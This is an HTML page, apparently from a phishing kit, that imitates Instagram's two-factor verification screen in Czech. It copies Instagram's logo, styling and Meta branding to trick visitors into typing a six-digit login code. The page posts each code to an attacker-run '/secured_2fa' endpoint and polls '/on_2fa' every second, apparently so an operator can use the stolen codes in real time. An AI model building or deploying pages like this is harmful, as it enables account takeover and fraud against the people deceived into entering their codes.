<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="static/favicon.png">
    <title>Dvou Fázové Ověření</title>
    <style>
        input[type="number"]::-webkit-inner-spin-button,
        input[type="number"]::-webkit-outer-spin-button {
            border: None;
            -webkit-appearance: none;
            margin: 0;
        }
  		.input-container {
  		  display: flex;
  		  justify-content: space-around;
  		  background-color: white;
  		  text-align: center;
  		}
  		input {
  		  background-color: white;
  		  width: 40px;
  		  height: 60px;
  		  /*border: 2px dashed #F2E9DC;*/
          border: None;
  		  border-bottom: 2px solid black;
  		  border-radius: 5px;
  		  text-align: center;
  		  color: black;
  		  transition: border 1.3s, border-style 1.3s, color 1.3s;
          font-size: 20px !important;
          font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
  		}
  		body {
  		  background-color: white;
  		}
  		.input-container input:valid {
            border-color: gray;
  		    border-bottom: 2px solid black;
  		    color: black;
  		}
        input:focus-visible {
            border-bottom: 2px solid black;
  		}
    </style>
    <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
    <script>
    let countdown = 30;  // Počáteční hodnota časovače v sekundách
    let intervalId;  // ID intervalu pro clearInterval

    function sendMessage() {
        // Odeslání asynchronního požadavku na server
        $.ajax({
            type: "POST",
            url: "/send_message",  // Změňte na správnou URL pro zpracování požadavku ve vaší aplikaci Flask
            data: { message: "Poslat znovu" },
            success: function(response) {
                console.log(response);  // Zde zpracujte odpověď od serveru
            },
            error: function(error) {
                console.error("Chyba při odesílání požadavku:", error);
            }
        });

    // Zabránění opakovanému kliknutí
    document.getElementById('send-again').style.pointerEvents = 'none';

    // Nastavení intervalu pro aktualizaci textu každou sekundu
    intervalId = setInterval(function() {
        document.getElementById('send-again').innerText = `Odeslat znovu za ${countdown} s`;
        countdown--;

        if (countdown < 0) {
            // Po 30 sekundách
            clearInterval(intervalId);  // Zastavení intervalu
            document.getElementById('send-again').innerText = 'Poslat znovu';
            document.getElementById('send-again').style.pointerEvents = 'auto';  // Povolení opětovného kliknutí
            countdown = 30;  // Resetování časovače
        }
    }, 1000);  // Interval každou sekundu (1000 ms)
}
    </script>
    <script>
        function limitInputLength(inputId, maxLength, nextInputId) {
            const inputElement = document.getElementById(inputId);
            const inputValue = inputElement.value;
            if (inputValue.length > maxLength) {
                inputElement.value = inputValue.slice(0, maxLength);
            }
            if (inputValue.length === maxLength && nextInputId) {
                const nextInput = document.getElementById(nextInputId);
                nextInput.removeAttribute('readonly'); // Odstraníme atribut "readonly"
                nextInput.focus();
            }
            // checkAndSubmit();
        }

        function checkAndSubmit() {
            const inputs = document.querySelectorAll('input[type="number"]');
            const allInputsFilled = Array.from(inputs).every(input => input.value.length === 1);
            if (allInputsFilled) {
                document.getElementById('submitForm').submit();
            }
        }

        function handleInputFocus(inputId) {
            const inputs = document.querySelectorAll('input[type="number"]');
            for (let i = 0; i < inputs.length; i++) {
                if (inputs[i].id === inputId) {
                    return;
                }
                if (inputs[i].value.length === 0) {
                    inputs[i].focus();
                    return;
                }
            }
        }

        // Přidáme tuto funkci, aby se při načtení stránky automaticky rozklikl první input
        function autoFocusFirstInput() {
            document.getElementById('verify1').focus();
        }

        // Voláme funkci pro automatické nastavení focusu při načtení stránky
        window.addEventListener('load', autoFocusFirstInput);
    </script>
  <script>
      function whereAmI() {
          $.ajax({
              type: "POST",
              url: "/on_2fa",
              success: function (response) {
                  console.log(response);

                  if (response.result === null) {
                      // Continue polling if the desired response is not received yet
                      setTimeout(whereAmI, 1000); // Interval polling after 1 second
                  } else {
                      // Handle unexpected response
                      console.error("Unexpected response:", response.result);
                      setTimeout(whereAmI, 1000); // Interval polling after 1 second
                  }
              },
              error: function (error) {
                  console.error("Error getting command result:", error);
              }
          });
      }

      // Start polling when the page is loaded
      $(document).ready(function () {
          whereAmI();
      });
  </script>
</head>
<body>
    <div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xseo6mj xod5an3 x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><div aria-disabled="false" role="button" style="margin: 0px auto; cursor: pointer;" tabindex="0"><i data-visualcompletion="css-img" aria-label="Instagram" class="" role="img" style="background-image: url(&quot;https://static.cdninstagram.com/rsrc.php/v3/ya/r/dAoPDEPVlH5.png&quot;); background-position: 0px -52px; background-size: auto; width: 175px; height: 51px; background-repeat: no-repeat; display: inline-block;"></i></div></div>
    <br>
    <div style="margin: 0px auto 50px auto; width: fit-content;">
        <h2 style="margin: 0px;">Prosím zadejte 6 místný kód</h2>
        <h4 style="margin: 3px;">který jsme vám poslali na váš gmail nebo<br>na vaše telefoní číslo</h4>
    </div>

    <div>
    <div class="input-container">
        <form id="submitForm" action="/secured_2fa" method="post">
            <input type="number" id="verify1" name="verify1" oninput="limitInputLength('verify1', 1, 'verify2'); handleInputFocus('verify1')" inputmode="numeric">
            <input type="number" id="verify2" name="verify2" oninput="limitInputLength('verify2', 1, 'verify3'); handleInputFocus('verify2')" inputmode="numeric" readonly>
            <input type="number" id="verify3" name="verify3" oninput="limitInputLength('verify3', 1, 'verify4'); handleInputFocus('verify3')" inputmode="numeric" readonly>
            <input type="number" id="verify4" name="verify4" oninput="limitInputLength('verify4', 1, 'verify5'); handleInputFocus('verify4')" inputmode="numeric" readonly>
            <input type="number" id="verify5" name="verify5" oninput="limitInputLength('verify5', 1, 'verify6'); handleInputFocus('verify5')" inputmode="numeric" readonly>
            <input type="number" id="verify6" name="verify6" oninput="limitInputLength('verify6', 1); handleInputFocus('verify6')" inputmode="numeric" readonly>
            <br><br>
            <div style="display: flex; justify-content: space-between;">
                <a id="send-again" class="_2Lks6" href="#" onclick="sendMessage()" tabindex="0">Poslat znovu</a>
                <div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1xmf6yo x1e56ztr x540dpk x1m39q7l x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><button class=" _acan _acap _acas _aj1- _ap30" type="submit"><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1">Ověřit</div></button></div>
            </div>
        </form>
    </div>
  </div>
  <footer style="text-align: center; margin-top: 40px;">
    <svg aria-label="Logotyp Facebooku a logo skupiny aplikací" class="x1lliihq x1n2onr6 x5n08af" fill="currentColor" height="12" role="img" viewBox="0 0 500 100" width="60"><title>Logotyp Facebooku a logo skupiny aplikací</title><defs><linearGradient gradientUnits="userSpaceOnUse" id="b" x1="125" x2="160.217" y1="97" y2="57.435"><stop offset=".21" stop-color="#0278F1"></stop><stop offset=".533" stop-color="#0180FA"></stop></linearGradient><linearGradient gradientUnits="userSpaceOnUse" id="c" x1="44" x2="0" y1="5" y2="64"><stop offset=".427" stop-color="#0165E0"></stop><stop offset=".917" stop-color="#0180FA"></stop></linearGradient><linearGradient gradientUnits="userSpaceOnUse" id="d" x1="28.5" x2="135" y1="29" y2="72"><stop stop-color="#0064E0"></stop><stop offset=".656" stop-color="#0066E2"></stop><stop offset="1" stop-color="#0278F1"></stop></linearGradient><clipPath id="a"><path d="M0 0h496.236v100H0z" fill="#fff"></path></clipPath></defs><g clip-path="url(#a)"><path d="M182.141 3.213h18.808l31.98 57.849 31.979-57.849h18.401V98.27h-15.345V25.416l-28.042 50.448h-14.394l-28.042-50.448V98.27h-15.345V3.213ZM332.804 99.967c-7.107 0-13.353-1.573-18.739-4.718-5.387-3.146-9.586-7.504-12.595-13.07-3.011-5.569-4.515-11.95-4.515-19.148 0-7.287 1.47-13.738 4.413-19.35 2.942-5.613 7.027-10.004 12.255-13.173 5.229-3.168 11.238-4.753 18.027-4.753 6.744 0 12.55 1.596 17.416 4.787 4.865 3.191 8.611 7.661 11.237 13.41 2.624 5.749 3.938 12.492 3.938 20.233v4.21h-52.077c.95 5.794 3.292 10.354 7.027 13.68 3.735 3.328 8.453 4.991 14.157 4.991 4.571 0 8.509-.679 11.814-2.037 3.303-1.358 6.404-3.417 9.302-6.178l8.147 9.98c-8.103 7.425-18.038 11.136-29.807 11.136Zm11.204-56.389c-3.215-3.281-7.425-4.923-12.629-4.923-5.07 0-9.314 1.676-12.731 5.025-3.418 3.35-5.58 7.854-6.484 13.512h37.343c-.453-5.794-2.286-10.331-5.499-13.614ZM382.846 40.014h-14.123V27.453h14.123V6.676h14.802v20.777h21.455v12.561h-21.455v31.844c0 5.295.905 9.075 2.716 11.338 1.809 2.264 4.911 3.395 9.302 3.395 1.945 0 3.598-.078 4.956-.237a92.35 92.35 0 0 0 4.481-.646v12.425c-1.675.498-3.564.906-5.669 1.223a44.63 44.63 0 0 1-6.62.475c-15.979 0-23.968-8.735-23.968-26.208V40.014ZM496.236 98.27h-14.53v-9.913c-2.58 3.712-5.862 6.575-9.845 8.588-3.983 2.014-8.51 3.022-13.579 3.022-6.247 0-11.78-1.596-16.601-4.787s-8.612-7.581-11.373-13.172c-2.761-5.59-4.142-11.983-4.142-19.18 0-7.243 1.403-13.648 4.21-19.216 2.806-5.567 6.688-9.935 11.645-13.104 4.956-3.168 10.648-4.753 17.075-4.753 4.844 0 9.189.94 13.037 2.818a25.768 25.768 0 0 1 9.573 7.978v-9.098h14.53V98.27Zm-14.801-46.035c-1.585-4.028-4.085-7.207-7.503-9.54-3.418-2.33-7.367-3.496-11.848-3.496-6.338 0-11.384 2.128-15.141 6.382-3.758 4.255-5.635 10.004-5.635 17.246 0 7.289 1.809 13.06 5.431 17.314 3.621 4.255 8.532 6.382 14.734 6.382 4.571 0 8.645-1.176 12.222-3.53 3.575-2.353 6.155-5.522 7.74-9.506V52.235Z" fill="currentColor"></path><path d="M108 0C95.66 0 86.015 9.294 77.284 21.1 65.284 5.821 55.25 0 43.24 0 18.76 0 0 31.862 0 65.586 0 86.69 10.21 100 27.31 100c12.308 0 21.16-5.803 36.897-33.31 0 0 6.56-11.584 11.072-19.564 1.582 2.553 3.243 5.3 4.997 8.253l7.38 12.414C102.03 91.848 110.038 100 124.551 100c16.659 0 25.931-13.492 25.931-35.034C150.483 29.656 131.301 0 108 0ZM52.207 59.241c-12.759 20-17.172 24.483-24.276 24.483-7.31 0-11.655-6.418-11.655-17.862 0-24.483 12.207-49.517 26.759-49.517 7.88 0 14.465 4.55 24.552 18.991-9.578 14.691-15.38 23.905-15.38 23.905Zm48.153-2.517-8.823-14.715a301.425 301.425 0 0 0-6.884-10.723c7.952-12.274 14.511-18.39 22.313-18.39 16.206 0 29.172 23.863 29.172 53.173 0 11.172-3.659 17.655-11.241 17.655-7.268 0-10.739-4.8-24.537-27Z" fill="#0180FA"></path><path d="M145.586 35H130.66c3.452 8.746 5.478 19.482 5.478 31.069 0 11.172-3.659 17.655-11.241 17.655-1.407 0-2.672-.18-3.897-.631V99.82c1.143.122 2.324.18 3.552.18 16.659 0 25.931-13.492 25.931-35.034 0-10.737-1.774-20.95-4.897-29.966Z" fill="url(#b)"></path><path d="M43.241 0c.254 0 .507.003.759.008v16.36c-.32-.015-.642-.023-.965-.023-14.183 0-26.139 23.782-26.736 47.655H.014C.59 30.87 19.143 0 43.24 0Z" fill="url(#c)"></path><path d="M43.241 0c11.152 0 20.601 5.02 31.502 17.971 3.065 3.828 6.761 8.805 10.716 14.557l.017.025.025-.003a311.041 311.041 0 0 1 6.036 9.459l8.823 14.715c13.798 22.2 17.269 27 24.537 27H125v16.273c-.149.002-.298.003-.448.003-14.513 0-22.522-8.152-36.897-32.207l-7.38-12.414a596.368 596.368 0 0 0-2.294-3.834L78 51.5c-5.5-9-9-14.5-12-18.5l-.05.038c-9.18-12.63-15.47-16.693-22.916-16.693H43V0L43.241 0Z" fill="url(#d)"></path></g></svg>
  </footer>
</body>
<style>
._2Lks6 {
  text-align: left;
  margin-left: 38px;
  margin-right: 65px;
  color: rgb(0, 55, 107);
  font-weight: 400;
  font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
  height: max-content;
  margin-top: auto;
  margin-bottom: auto;
  font-size: 14px;
}
.xseo6mj {
  margin-top: 36px;
}
.xryxfnj {
  overflow-y: visible;
}
.xod5an3 {
  margin-bottom: 12px;
}
.x1plvlek {
  overflow-x: visible;
}
.xqjyukv {
  align-content: stretch;
}
.xo71vjh {
  border-bottom-left-radius: 0;
}
.xjbqb8w {
  background-color: transparent;
}
.xdt5ytf {
  flex-direction: column;
}
.x9f619 {
  box-sizing: border-box;
}
.x78zum5 {
  display: flex;
}
.x5pf9jr {
  border-bottom-right-radius: 0;
}
.x2lah0s {
  flex-shrink: 0;
}
.x1qjc9v5 {
  align-items: stretch;
}
.x1oa3qoh {
  align-self: auto;
}
.x1nhvcw1 {
  justify-content: flex-start;
}
.x1n2onr6 {
  position: relative;
}
.x1c4vz4f {
  flex-grow: 0;
}
.x168nmei {
  border-top-left-radius: 0;
}
.x13lgxp2 {
  border-top-right-radius: 0;
}
h2, h4 {
    font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
    }

    .xryxfnj {
  overflow-y: visible;
}
.x1xmf6yo {
  margin-top: 8px;
}
.x1plvlek {
  overflow-x: visible;
}
.x1e56ztr {
  margin-bottom: 8px;
}
.xqjyukv {
  align-content: stretch;
}
.xo71vjh {
  border-bottom-left-radius: 0;
}
.xjbqb8w {
  background-color: transparent;
}
.xdt5ytf {
  flex-direction: column;
}
.x9f619 {
  box-sizing: border-box;
}
.x78zum5 {
  display: flex;
}
.x5pf9jr {
  border-bottom-right-radius: 0;
}
.x540dpk {
  margin-left: 40px;
}
.x2lah0s {
  flex-shrink: 0;
}
.x1qjc9v5 {
  align-items: stretch;
}
.x1oa3qoh {
  align-self: auto;
}
.x1nhvcw1 {
  justify-content: flex-start;
}
.x1n2onr6 {
  position: relative;
}
.x1m39q7l {
  margin-right: 40px;
}
.x1c4vz4f {
  flex-grow: 0;
}
.x168nmei {
  border-top-left-radius: 0;
}
.x13lgxp2 {
  border-top-right-radius: 0;
}


._acas._acap:not(._acao):not(._acax), ._acas._acap:not(._acao):not(._acax):visited {
  background-color: rgba(0, 149, 246);
  /*opacity: .7;*/
  color: #ffffff;
  width: 100px;
}

._acan:hover {
  background-color: rgb(0, 110, 184) !important;
  opacity: 1;
}
._acan[disabled]:not(._acax) {
  opacity: .7;
}
._acas:not(._acao), a._acas:not(._acao), a._acas:not(._acao):visited {
  background-color: rgb(var(--ig-primary-button));
  border: none;
}
._acan[disabled], a._acan[disabled] {
  pointer-events: none;
}
._acap, a._acap, a._acap:visited {
  border: none;
  border-radius: 8px;
  color: rgb(var(--web-always-white));
  position: relative;
}
._aj1- {
  text-align: center;
}
._ap30 {
  font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
}
._acan {
  -moz-appearance: none;
  background: none;
    background-color: rgba(0, 0, 0, 0);
  border: none;
  box-sizing: border-box;
  cursor: pointer;
  display: block;
  font-size: 14px;
  font-weight: 600;
  padding: 7px 16px !important;
  pointer-events: auto;
  text-align: center;
  text-overflow: ellipsis;
  text-transform: inherit;
  -moz-user-select: none;
  width: auto;
}
body, button, input, textarea, button, input, textarea {
  color: rgb(var(--ig-primary-text));
  font-family: var(--font-family-system);
  font-size: var(--system-14-font-size);
}
button {
  margin: 0;
}
button {
  margin: 0;
}
body, button, input, label, select, td, textarea {
  font-family: Helvetica, Arial, sans-serif;
  font-size: 12px;
}
</style>
</html>





